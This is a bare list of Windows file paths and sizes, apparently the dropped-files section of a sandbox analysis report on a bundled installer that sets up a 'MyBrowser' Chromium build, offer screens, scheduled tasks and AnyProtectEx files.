    %Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.cyl (428 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\img12_1.jpg (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\manlib.dll (26 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\registry.dll (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Math.dll (2489 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\header.bmp (1568 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsDialogs.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\DSS_Unq_IMapplication_mon_remote[1].htm (609 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\FirstResult.txt (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsisunz.dll (211 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\blowfish.dll (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\serlib.dll (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsCBHTML5.dll (1660 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\OfferScreen_12.html (1681 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\GetVersion.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Offer1.zip (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\inner.png (146 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\SecondResult.txt (609 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\OfferScreen_460.html (2281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Offer2.zip (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\gmsd_re_005010096\1.20\cnf.cyl (269 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\Bundle_OperaRUnew[1].exe (7288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr18.tmp (7288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy3A.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj39.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj38.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\0[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh33.tmp (28320 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\BiTool[1].dll (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\modern-wizard.bmp (26 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb32.tmp (108018 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bitool.xxx (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\xml.dll (2005 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\binsis142.xml (1557 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\Banner.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\nsDialogs.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\md5dll.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\binsischeck654.xml (4183 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\Math.dll (2489 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\setup[1].exe (28320 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\gizmodo.ico (2993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_mail.ico (1913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ikea.ico (2993 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\priceline.ico (1913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\theguardian.ico (1597 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nba.ico (1601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\imdb.ico (2993 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_news.ico (2993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nfl.ico (1913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_translate.ico (1592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\msn.ico (1588 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ted.ico (1913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\cnn.ico (1601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\pinterest.ico (1592 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\gmail.ico (1601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\search.ico (1917 bytes)
    %WinDir%\Tasks\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.job (1656 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\youtube.ico (3913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\expedia.ico (1921 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\groupom.ico (2993 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\skype.ico (1597 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\reddit.ico (1917 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\icon.json (21 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\booking.com.ico (1601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\hotels.com.ico (1601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\facebook.ico (3913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.exe (14988 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\huffingtonpost.ico (1909 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_search.ico (5593 bytes)
    %WinDir%\Tasks\MyBrowser.job (1966 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yandex.ico (1588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\weather_channel.ico (5593 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\espn.ico (1588 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\mail_live_msn.ico (1592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\forbes.ico (1592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\setup.exe (37305 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yelp.ico (1597 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\chrome.packed.7z (1342431 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\9gag.ico (1913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bbc.ico (1588 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nytimes.ico (1921 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_plus.ico (1921 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ebay.ico (1913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\linkedin.ico (1592 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\wikipedia.ico (1913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\etsy.ico (3913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\tripadvisor.ico (1917 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\twitter.ico (1588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].004 (3985887 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].005 (3985887 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].002 (3985887 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].003 (3985887 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].001 (3985887 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ipgeoapi[1] (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo.ico (1592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\netflix.ico (1909 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bestbuy.ico (3913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\prefs (823 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\mail.ru.ico (1909 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\tumblr.ico (1592 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\agoda.ico (1921 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\target.ico (1909 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\walmart.ico (1601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\amazon.ico (2993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_finance.ico (2993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\kayak.com.ico (1601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bing.ico (1597 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\8819.exe (14988 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin (4 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\VisualElementsManifest.xml (392 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\wow_helper.exe (67 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\mybrowser.exe (3869 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\chrome.7z (1161171 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
    %Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf48.tmp (19514 bytes)
    %Program Files%\AnyProtectEx\product.guid (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\flush-inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\WmiInspector.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\checks.txt (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss24.tmp (5929 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\thankyou[1].php (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\md5dll.dll (6 bytes)
